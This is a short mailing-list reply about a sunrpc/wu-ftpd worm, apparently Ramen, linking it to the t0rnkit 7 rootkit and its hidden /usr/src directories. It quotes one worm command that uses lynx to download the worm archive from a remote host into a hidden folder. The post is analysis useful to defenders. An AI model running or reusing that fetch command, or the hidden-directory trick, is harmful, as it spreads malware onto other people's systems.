Re: sunrpc / wu-ftpd worm ?

[daniel_gerald () HOTMAIL COM]

> " lynx -source http://%s:27374 
> /usr/src/.poop/ramen.tgz "

hmmmm... seems like this is another modified 
version of Old t0rnkit 7.  The use of /usr/src directory 
for hiding rootkit file is just the same as the old t0rnkit 
with it's /usr/src/.puta directory.

Ever since t0rnkit 7 was made public by author, there 
has been many modified versions of it, some with 
plain directory name changes and others with some 
replacement trojans, however, most or all the 
versions retains the rootkit directory structures and 
the config files.

-danny.